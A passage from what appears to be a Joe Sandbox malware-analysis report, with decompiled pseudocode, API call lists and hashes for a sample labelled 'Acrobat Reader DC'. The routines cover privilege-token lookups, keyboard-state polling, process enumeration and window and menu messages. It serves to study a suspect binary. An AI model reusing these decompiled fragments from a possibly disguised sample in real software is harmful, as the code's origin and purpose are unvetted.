                                  										}
                                  										_t46 = _t46 + 0xc;
                                  										_t20 =  &_v16;
                                  										 *_t20 = _v16 - 1;
                                  									} while ( *_t20 != 0);
                                  									_v12 = _v12 + 0xc;
                                  									_t58 = _t58 + 1;
                                  								} while (_t58 <  *_t54);
                                  							}
                                  							_t45 = 1;
                                  							_t39 = 0;
                                  							_t48 =  &_v36;
                                  							while( *_t48 != 0) {
                                  								_t39 = _t39 + 1;
                                  								_t48 = _t48 + 0xc;
                                  								if(_t39 < 2) {
                                  									continue;
                                  								} else {
                                  								}
                                  								goto L18;
                                  							}
                                  							_t45 = 0;
                                  						}
                                  					}
                                  				}
                                  				L18:
                                  				_t32 = _v8;
                                  				if(_t32 != 0) {
                                  					CloseHandle(_t32);
                                  				}
                                  				E00436BA9(_t54);
                                  				return _t45;
                                  			}

                                  APIs
                                  • GetCurrentProcess.KERNEL32(00000008,00000000,?), ref: 00436F6A
                                  • OpenThreadToken.ADVAPI32(00000000), ref: 00436F6D
                                  • GetCurrentProcess.KERNEL32(00000008,?), ref: 00436F7D
                                  • OpenProcessToken.ADVAPI32(00000000), ref: 00436F80
                                  • LookupPrivilegeValueW.ADVAPI32(00000000,SeAssignPrimaryTokenPrivilege,?), ref: 00436FB9
                                  • LookupPrivilegeValueW.ADVAPI32(00000000,SeIncreaseQuotaPrivilege,?), ref: 00436FD0
                                  • _memcmp.LIBCMT ref: 00437001
                                  • CloseHandle.KERNEL32(?), ref: 0043704B
                                  Strings
                                  • SeAssignPrimaryTokenPrivilege, xrefs: 00436FB1
                                  • SeIncreaseQuotaPrivilege, xrefs: 00436FC7
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Process$CurrentLookupOpenPrivilegeTokenValue$CloseHandleThread_memcmp
                                  • String ID: SeAssignPrimaryTokenPrivilege$SeIncreaseQuotaPrivilege
                                  • API String ID: 1446985595-805462909
                                  • Opcode ID: 20e3785b7433241d37dd94a03bfa4397e83b78d22b2bbb476a85e96c63628419
                                  • Instruction ID: 5d9cc79d75c838d3750a3a1f44766322371bceb9368f6a60d1057fe533f678da
                                  • Opcode Fuzzy Hash: 20e3785b7433241d37dd94a03bfa4397e83b78d22b2bbb476a85e96c63628419
                                  • Instruction Fuzzy Hash: 6531BEB2D40209ABDF20DBA1CD44AEFBBB8FB88310F14545BE940A7240D7789A45CFA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00448123(void* __eflags, intOrPtr _a4, signed short _a8, char _a12, signed int _a16) {
                                  				int _v8;
                                  				signed char _v12;
                                  				intOrPtr _v16;
                                  				long _v20;
                                  				signed short _v28;
                                  				intOrPtr _v32;
                                  				long _v40;
                                  				long _v52;
                                  				long _v56;
                                  				void* _v60;
                                  				void* _v8252;
                                  				intOrPtr _t79;
                                  				long _t81;
                                  				long _t85;
                                  				long _t89;
                                  				intOrPtr _t92;
                                  				long _t95;
                                  				signed short _t99;
                                  				long _t101;
                                  				signed int _t105;
                                  				intOrPtr _t107;
                                  				intOrPtr _t108;
                                  				intOrPtr _t109;
                                  				intOrPtr _t114;
                                  				intOrPtr _t116;
                                  				signed short _t121;
                                  				intOrPtr _t129;
                                  				intOrPtr _t135;
                                  				struct HWND__* _t140;
                                  
                                  				E00422240(0x203c);
                                  				if(E00441AF5(0x4a8630, _a16,  &_a16,  &_v8) == 0) {
                                  					L15:
                                  					__eflags = 0;
                                  					return 0;
                                  				} else {
                                  					_t107 =  *0x4a8690; // 0x0
                                  					_t108 =  *0x4a86a4; // 0xa51ad0
                                  					_t105 = _v8;
                                  					_v16 =  *((intOrPtr*)( *((intOrPtr*)(_t107 + _a16 * 4))));
                                  					_t140 =  *( *( *(_t108 + _t105 * 4)));
                                  					_t79 = _a4;
                                  					 *(_t79 + 0x30) = _t140;
                                  					_t109 =  *0x4a86a4; // 0xa51ad0
                                  					 *((char*)(_t79 + 0x8b)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t109 + _t105 * 4)))) + 0x8b));
                                  					_t81 = SendMessageW(SendMessageW(_t140, 0x101f, 0, 0), 0x1200, 0, 0);
                                  					 *(_a4 + 0x8c) = _t81;
                                  					_t129 =  *0x4a86a4; // 0xa51ad0
                                  					_v20 = _t81;
                                  					 *( *((intOrPtr*)( *((intOrPtr*)(_t129 + _t105 * 4)))) + 0x8c) = _t81;
                                  					_v12 = GetWindowLongW(_t140, 0xfffffff0);
                                  					E00412F40( &_v60, 0, 0x28);
                                  					_t85 = SendMessageW(_t140, 0x1004, 0, 0);
                                  					 *(_a4 + 0x80) = _t85;
                                  					_t114 =  *0x4a86a4; // 0xa51ad0
                                  					_v60 = 7;
                                  					_v32 = 0xfffffffe;
                                  					_t116 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t114 + _t105 * 4)))) + 0x94));
                                  					_a16 = 1;
                                  					_t145 = _t116 - 0xffffffff;
                                  					if(_t116 > 0xffffffff) {
                                  						_v32 = _t116;
                                  					}
                                  					_v56 = _t85;
                                  					_v40 =  &_v8252;
                                  					_v28 = _a8;
                                  					_v52 = 0;
                                  					E00430626(_t145,  &_v8252,  &_a12, 0x4a8644);
                                  					_t89 = SendMessageW(_t140, 0x104d, 0,  &_v60);
                                  					_v8 = _t89;
                                  					_t146 = _t89 - 0xffffffff;
                                  					if(_t89 == 0xffffffff) {
                                  						goto L15;
                                  					} else {
                                  						while(E00430626(_t146,  &_v8252,  &_a12, 0x4a8644) != 0) {
                                  							_t95 = _a16;
                                  							_v52 = _t95;
                                  							if(_t95 > _v20) {
                                  								SendMessageW(_t140, 0x1008, _v8,  &_v60);
                                  								goto L15;
                                  							} else {
                                  								if(_v8252 == 0 || SendMessageW(_t140, 0x1074, _v8,  &_v60) != 0) {
                                  									if((_v12 & 0x00000001) != 0) {
                                  										_t99 = SendMessageW(_t140, 0x1057, 0,  &_v8252) + 0xc;
                                  										_a8 = _t99;
                                  										if(_t99 > 0x96) {
                                  											_a8 = 0x96;
                                  										}
                                  										_t101 = SendMessageW(_t140, 0x101d, _a16, 0);
                                  										_t121 = _a8;
                                  										_t146 = _t101 - _t121;
                                  										if(_t101 <= _t121) {
                                  											SendMessageW(_t140, 0x101e, _a16, _t121 & 0x0000ffff);
                                  										}
                                  									}
                                  									_a16 = _a16 + 1;
                                  									continue;
                                  								} else {
                                  									goto L15;
                                  								}
                                  							}
                                  							goto L19;
                                  						}
                                  						_t135 = _a4;
                                  						__eflags =  *((char*)(_t135 + 0x8b)) - 0xff;
                                  						if( *((char*)(_t135 + 0x8b)) != 0xff) {
                                  							_t92 =  *0x4a86a4; // 0xa51ad0
                                  							E00430B87(_v16,  *((intOrPtr*)( *((intOrPtr*)(_t92 + _t105 * 4)))), 1);
                                  						}
                                  						return 1;
                                  					}
                                  				}
                                  				L19:
                                  			}

                                  APIs
                                  • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 004481A8
                                  • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 004481AB
                                  • GetWindowLongW.USER32(?,000000F0), ref: 004481CF
                                  • _memset.LIBCMT ref: 004481E0
                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481F2
                                  • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00448266
                                  • SendMessageW.USER32(?,00001074,?,00000007), ref: 004482B4
                                  • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482CF
                                  • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482F1
                                  • SendMessageW.USER32(?,0000101E,00000001,?), ref: 00448308
                                  • SendMessageW.USER32(?,00001008,?,00000007), ref: 00448320
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: MessageSend$LongWindow_memset
                                  • String ID:
                                  • API String ID: 830647256-0
                                  • Opcode ID: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                  • Instruction ID: c7c5d5d6f9bf0949bb943eac7ac5a8ec30049dd2ce11923e35461b50cec8bdb0
                                  • Opcode Fuzzy Hash: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                  • Instruction Fuzzy Hash: 97617C70A00208AFEB10DF94DC81FEE77B9FF49714F10429AF914AB291DBB5AA41CB54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 28%
                                  			E00479362(void* __eflags, void* __fp0, char _a4) {
                                  				char _v8;
                                  				intOrPtr _v12;
                                  				char _v16;
                                  				char _v20;
                                  				signed int _v24;
                                  				signed int _v28;
                                  				char _v36;
                                  				signed int _v40;
                                  				intOrPtr _v44;
                                  				char _v52;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				void* _t58;
                                  				intOrPtr _t61;
                                  				char* _t62;
                                  				signed int _t94;
                                  				void* _t102;
                                  				void* _t103;
                                  				intOrPtr _t104;
                                  				signed int _t108;
                                  				signed int _t111;
                                  				void* _t112;
                                  				void* _t123;
                                  
                                  				_t123 = __fp0;
                                  				_t58 = E004323E1( &_a4, 0);
                                  				_t102 = _t58;
                                  				__imp__#41(0xc, _t102,  &_v8);
                                  				if(_t58 < 0) {
                                  					L13:
                                  					E00408F40(_t102,  &_a4);
                                  					return 0;
                                  				} else {
                                  					_t94 = 0;
                                  					if(_t102 > 0) {
                                  						do {
                                  							_t4 = _t94 + 1; // 0x1
                                  							_t111 = _t4;
                                  							 *((intOrPtr*)(_v8 + 0x14 + _t94 * 8)) = 0;
                                  							 *((intOrPtr*)(_v8 + 0x10 + _t94 * 8)) = E004323E1( &_a4, _t111);
                                  							_t94 = _t111;
                                  						} while (_t94 < _t102);
                                  					}
                                  					_t61 = _v8;
                                  					 *((short*)(_t61 + 2)) = 0x880;
                                  					 *((intOrPtr*)(_v8 + 4)) = 0x10;
                                  					__imp__#37(_v8);
                                  					if(_t61 < 0) {
                                  						__imp__#38(_v8);
                                  						goto L13;
                                  					} else {
                                  						_t62 =  &_v36;
                                  						__imp__#8(_t62);
                                  						_v28 = 0;
                                  						_v24 = 0;
                                  						_v52 = 0;
                                  						_v44 = 1;
                                  						_v40 = 0;
                                  						__imp__#23(_v8,  &_v16);
                                  						if(_t62 < 0) {
                                  							__imp__#39(_v8);
                                  							__imp__#38(_v8);
                                  							E00408F40(_t102,  &_v52);
                                  							__imp__#9( &_v36);
                                  							E00408F40(_t102,  &_a4);
                                  							return 0;
                                  						} else {
                                  							_v12 = _v16;
                                  							E00408E80( &_v52,  &_a4,  &_a4);
                                  							_t103 = E00479230( &_a4,  &_v52,  &_v20);
                                  							_t108 = 0;
                                  							if(_t103 > 0) {
                                  								_t91 = _v12;
                                  								do {
                                  									_t75 = _v20;
                                  									if( *((intOrPtr*)(_v20 + _t108 * 4)) != 0) {
                                  										_t112 = _t112 - 0x10;
                                  										E0040B960( *((intOrPtr*)(_t75 + _t108 * 4)), _t112, _t91, _t103);
                                  										E00470E55(_t91, _t103, _t123);
                                  										_t91 = _v12;
                                  										__imp__#10(_v12,  &_v36,  &_v36);
                                  									}
                                  									_v12 = _v12 + 0x10;
                                  									_t108 = _t108 + 1;
                                  								} while (_t108 < _t103);
                                  							}
                                  							__imp__#24(_v8);
                                  							_t104 = _v8;
                                  							E00408F40(_t104,  &_v52);
                                  							__imp__#9( &_v36);
                                  							_v28 = 0;
                                  							_v24 = 0;
                                  							E00408F40(_t104,  &_a4);
                                  							return _t104;
                                  						}
                                  					}
                                  				}
                                  			}

                                  APIs
                                  • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,004795FD), ref: 00479380
                                  • SafeArrayAllocData.OLEAUT32(004795FD), ref: 004793CF
                                  • VariantInit.OLEAUT32(?), ref: 004793E1
                                  • SafeArrayAccessData.OLEAUT32(004795FD,?), ref: 00479402
                                  • VariantCopy.OLEAUT32(?,?), ref: 00479461
                                  • SafeArrayUnaccessData.OLEAUT32(004795FD), ref: 00479474
                                  • VariantClear.OLEAUT32(?), ref: 00479489
                                  • SafeArrayDestroyData.OLEAUT32(004795FD), ref: 004794AE
                                  • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794B8
                                  • VariantClear.OLEAUT32(?), ref: 004794CA
                                  • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794E7
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                  • String ID:
                                  • API String ID: 2706829360-0
                                  • Opcode ID: 23f20de2412018a08f4578d4e0f12eac70a18aacfa0f9406534bc12fd33cd3b0
                                  • Instruction ID: 8c269571b42c1441f814514f03b92edd351012a73d8239c9f379a0a89e1b4ae1
                                  • Opcode Fuzzy Hash: 23f20de2412018a08f4578d4e0f12eac70a18aacfa0f9406534bc12fd33cd3b0
                                  • Instruction Fuzzy Hash: F6515E76A00119ABCB00DFA5DD849DEB7B9FF88704F10856EE905A7241DB749E06CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E004447E0(intOrPtr _a4, char* _a8) {
                                  				intOrPtr _v99;
                                  				intOrPtr _v100;
                                  				intOrPtr _v169;
                                  				intOrPtr _v242;
                                  				intOrPtr _v243;
                                  				intOrPtr _v244;
                                  				char _v260;
                                  				char* _t55;
                                  				intOrPtr _t78;
                                  				char* _t79;
                                  
                                  				_t79 = _a8;
                                  				_t78 = _a4;
                                  				 *_t79 = 0;
                                  				 *((short*)(_t79 + 4)) = 0;
                                  				if( *((intOrPtr*)(_t78 + 0x20)) == 0) {
                                  					if((0x00008000 & GetAsyncKeyState(0xa0)) != 0 || (0x00008000 & GetKeyState(0xa0)) != 0) {
                                  						if( *((char*)(_t78 + 0x1a)) == 0) {
                                  							 *_t79 = 1;
                                  						}
                                  					}
                                  					if((0x00008000 & GetAsyncKeyState(0xa1)) != 0 || (0x00008000 & GetKeyState(0xa1)) != 0) {
                                  						if( *((char*)(_t78 + 0x1b)) == 0) {
                                  							 *((char*)(_t79 + 1)) = 1;
                                  						}
                                  					}
                                  					if((0x00008000 & GetAsyncKeyState(0x11)) != 0 || (0x00008000 & GetKeyState(0x11)) != 0) {
                                  						if( *((char*)(_t78 + 0x1c)) == 0) {
                                  							 *((char*)(_t79 + 2)) = 1;
                                  						}
                                  					}
                                  					if((0x00008000 & GetAsyncKeyState(0x12)) != 0 || (0x00008000 & GetKeyState(0x12)) != 0) {
                                  						if( *((char*)(_t78 + 0x1d)) == 0) {
                                  							 *((char*)(_t79 + 3)) = 1;
                                  						}
                                  					}
                                  					if((0x00008000 & GetAsyncKeyState(0x5b)) != 0 || (0x00008000 & GetKeyState(0x5b)) != 0) {
                                  						_t55 = _t79;
                                  						if( *((char*)(_t78 + 0x1e)) == 0) {
                                  							 *((char*)(_t79 + 4)) = 1;
                                  							return _t55;
                                  						}
                                  						goto L39;
                                  					} else {
                                  						goto L18;
                                  					}
                                  				} else {
                                  					if(GetKeyboardState( &_v260) == 0) {
                                  						L18:
                                  						return _t79;
                                  					} else {
                                  						if(_v100 == 0x80 || _v244 == 0x80) {
                                  							if( *((char*)(_t78 + 0x1a)) == 0) {
                                  								 *_t79 = 1;
                                  							}
                                  						}
                                  						if(_v99 == 0x80 &&  *((char*)(_t78 + 0x1b)) == 0) {
                                  							 *((char*)(_t79 + 1)) = 1;
                                  						}
                                  						if(_v243 == 0x80 &&  *((char*)(_t78 + 0x1c)) == 0) {
                                  							 *((char*)(_t79 + 2)) = 1;
                                  						}
                                  						if(_v242 == 0x80 &&  *((char*)(_t78 + 0x1d)) == 0) {
                                  							 *((char*)(_t79 + 3)) = 1;
                                  						}
                                  						if(_v169 != 0x80) {
                                  							goto L18;
                                  						} else {
                                  							_t55 = _t79;
                                  							if( *((char*)(_t78 + 0x1e)) != 0) {
                                  								L39:
                                  								return _t55;
                                  							} else {
                                  								 *((char*)(_t79 + 4)) = 1;
                                  								return _t55;
                                  							}
                                  						}
                                  					}
                                  				}
                                  			}

                                  APIs
                                  • GetKeyboardState.USER32(?), ref: 0044480E
                                  • GetAsyncKeyState.USER32(000000A0), ref: 00444899
                                  • GetKeyState.USER32(000000A0), ref: 004448AA
                                  • GetAsyncKeyState.USER32(000000A1), ref: 004448C8
                                  • GetKeyState.USER32(000000A1), ref: 004448D9
                                  • GetAsyncKeyState.USER32(00000011), ref: 004448F5
                                  • GetKeyState.USER32(00000011), ref: 00444903
                                  • GetAsyncKeyState.USER32(00000012), ref: 0044491F
                                  • GetKeyState.USER32(00000012), ref: 0044492D
                                  • GetAsyncKeyState.USER32(0000005B), ref: 00444949
                                  • GetKeyState.USER32(0000005B), ref: 00444958
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: State$Async$Keyboard
                                  • String ID:
                                  • API String ID: 541375521-0
                                  • Opcode ID: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                  • Instruction ID: 827c2ee343902556a703916e37c968ecd50c133e95067caf6822082f003788d3
                                  • Opcode Fuzzy Hash: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                  • Instruction Fuzzy Hash: 27412B34A047C969FF31A6A4C8043A7BBA16FA1314F04805FD5C5477C1DBED99C8C7A9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E004485CB(struct HWND__** _a4, signed int _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20, int _a24) {
                                  				struct tagMENUITEMINFOW _v52;
                                  				signed int _t46;
                                  				struct HMENU__* _t58;
                                  				struct HMENU__* _t59;
                                  				signed int _t61;
                                  				intOrPtr _t63;
                                  				intOrPtr _t65;
                                  				intOrPtr _t72;
                                  				struct HWND__** _t79;
                                  				int _t80;
                                  				struct HWND__* _t81;
                                  
                                  				_t61 = _a8;
                                  				_t80 = _a16;
                                  				_t79 = _a4;
                                  				_v52.cbSize = 0x30;
                                  				E00412F40( &(_v52.fMask), 0, 0x2c);
                                  				if(_t80 != 0xffffffff) {
                                  					if(E00441AF5(0x4a8630, _t80,  &_a16,  &_a8) != 0) {
                                  						_t72 =  *0x4a8690; // 0x0
                                  						_t79 =  *( *(_t72 + _a16 * 4));
                                  						_t46 = _a8;
                                  						_t63 =  *0x4a86a4; // 0xa51ad0
                                  						 *(_t61 + 8) =  *( *((intOrPtr*)( *((intOrPtr*)(_t63 + _t46 * 4)))) + 8);
                                  						_t65 =  *0x4a86a4; // 0xa51ad0
                                  						if( *((char*)( *((intOrPtr*)( *((intOrPtr*)(_t65 + _t46 * 4)))) + 0x88)) == 0xc) {
                                  							L9:
                                  							if(IsMenu( *(_t61 + 8)) == 0) {
                                  								goto L5;
                                  							} else {
                                  								goto L10;
                                  							}
                                  						} else {
                                  							_v52.fMask = 4;
                                  							if(GetMenuItemInfoW( *(_t61 + 8), _t80, 0,  &_v52) == 0) {
                                  								goto L5;
                                  							} else {
                                  								 *(_t61 + 8) = _v52.hSubMenu;
                                  								goto L9;
                                  							}
                                  						}
                                  					} else {
                                  						goto L5;
                                  					}
                                  				} else {
                                  					_t58 = _t79[0x68];
                                  					if(_t58 == 0) {
                                  						_t59 = CreateMenu();
                                  						_t79[0x68] = _t59;
                                  						SetMenu( *_t79, _t59);
                                  						_t58 = _t79[0x68];
                                  						_t79[0x6a] = _t58;
                                  					}
                                  					 *(_t61 + 8) = _t58;
                                  					L10:
                                  					_t81 = CreatePopupMenu();
                                  					if(_t81 == 0) {
                                  						L5:
                                  						return 0;
                                  					} else {
                                  						_v52.dwTypeData = _a20;
                                  						_v52.wID = _a12;
                                  						_v52.fMask = 0x16;
                                  						_v52.fType = 0;
                                  						_v52.hSubMenu = _t81;
                                  						InsertMenuItemW( *(_t61 + 8), _a24, 1,  &_v52);
                                  						DrawMenuBar( *_t79);
                                  						_t79[0x6a] = _t81;
                                  						return 1;
                                  					}
                                  				}
                                  			}

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                  • String ID: 0
                                  • API String ID: 176399719-4108050209
                                  • Opcode ID: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                  • Instruction ID: 1651b4fd0bf3e4e6d8e032b2651979207be8780685d2f09cc615cc8e1c1775d8
                                  • Opcode Fuzzy Hash: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                  • Instruction Fuzzy Hash: 9D418B75A01209AFEB40DF98D884ADEB7B4FF49314F10815EED189B340DB74A851CFA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 62%
                                  			E00433D9E(intOrPtr _a4, long* _a8, void* _a12) {
                                  				unsigned int _v8;
                                  				char _v12;
                                  				intOrPtr _v16;
                                  				char _v24;
                                  				char _v540;
                                  				char _v1064;
                                  				char _v1580;
                                  				char _v2096;
                                  				char _v4144;
                                  				void* __edi;
                                  				unsigned int* _t36;
                                  				intOrPtr _t38;
                                  				intOrPtr _t42;
                                  				void* _t49;
                                  				long _t50;
                                  				signed int _t54;
                                  				intOrPtr _t62;
                                  				unsigned int _t74;
                                  				void* _t78;
                                  				void* _t79;
                                  				void* _t80;
                                  				void* _t81;
                                  
                                  				E00422240(0x102c);
                                  				_t36 =  &_v8;
                                  				__imp__EnumProcesses( &_v4144, 0x800, _t36);
                                  				if(_t36 != 0) {
                                  					_t4 =  &_a12; // 0x443d49
                                  					_t74 = _v8 >> 2;
                                  					 *((char*)( *_t4)) = 0;
                                  					_t38 = E00433D5F( &_v4144, _a4);
                                  					_t81 = _t80 + 4;
                                  					_t54 = 0;
                                  					_v16 = _t38;
                                  					if(_t74 != 0) {
                                  						while( *_a12 == 0) {
                                  							_t78 = OpenProcess(0x410, 0,  *(_t79 + _t54 * 4 - 0x102c));
                                  							__imp__EnumProcessModules(_t78,  &_v12, 4,  &_v8);
                                  							_t42 = _v12;
                                  							__imp__GetModuleBaseNameW(_t78, _t42,  &_v1064, 0x104);
                                  							if(_t42 != 0) {
                                  								E00413A0E( &_v1064,  &_v24,  &_v2096,  &_v540,  &_v1580);
                                  								E00411536( &_v540,  &_v1580);
                                  								_t49 = E004114AB(_t74,  &_v540, _a4);
                                  								_t81 = _t81 + 0x24;
                                  								if(_t49 != 0) {
                                  									_t62 = _v16;
                                  									if(_t62 != 0) {
                                  										_t50 =  *(_t79 + _t54 * 4 - 0x102c);
                                  										if(_t62 == _t50) {
                                  											 *_a8 = _t50;
                                  											goto L11;
                                  										}
                                  									}
                                  								} else {
                                  									 *_a8 =  *(_t79 + _t54 * 4 - 0x102c);
                                  									L11:
                                  									 *_a12 = 1;
                                  								}
                                  							}
                                  							CloseHandle(_t78);
                                  							_t54 = _t54 + 1;
                                  							if(_t54 < _t74) {
                                  								continue;
                                  							}
                                  							break;
                                  						}
                                  					}
                                  					return 1;
                                  				} else {
                                  					return 0;
                                  				}
                                  			}

                                  APIs
                                  • EnumProcesses.PSAPI(?,00000800,?,?,00443D49,?,?,?,004A8178), ref: 00433DBB
                                  • OpenProcess.KERNEL32(00000410,00000000,?,?,?,004A8178), ref: 00433E19
                                  • EnumProcessModules.PSAPI(00000000,?,00000004,?), ref: 00433E2C
                                  • GetModuleBaseNameW.PSAPI(00000000,?,?,00000104), ref: 00433E43
                                  • __wsplitpath.LIBCMT ref: 00433E6D
                                  • _wcscat.LIBCMT ref: 00433E80
                                  • __wcsicoll.LIBCMT ref: 00433E90
                                  • CloseHandle.KERNEL32(00000000), ref: 00433EC8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: EnumProcess$BaseCloseHandleModuleModulesNameOpenProcesses__wcsicoll__wsplitpath_wcscat
                                  • String ID: I=D
                                  • API String ID: 2903788889-2605949546
                                  • Opcode ID: e2a61d30099513a4b86aa9445ff639564bac9cad2a304c62a227ff9d1443cd16
                                  • Instruction ID: 36098e5712afd53b5e3c4de91d69c0015cf2cbbc5c01d2287a97767e02e0faf1
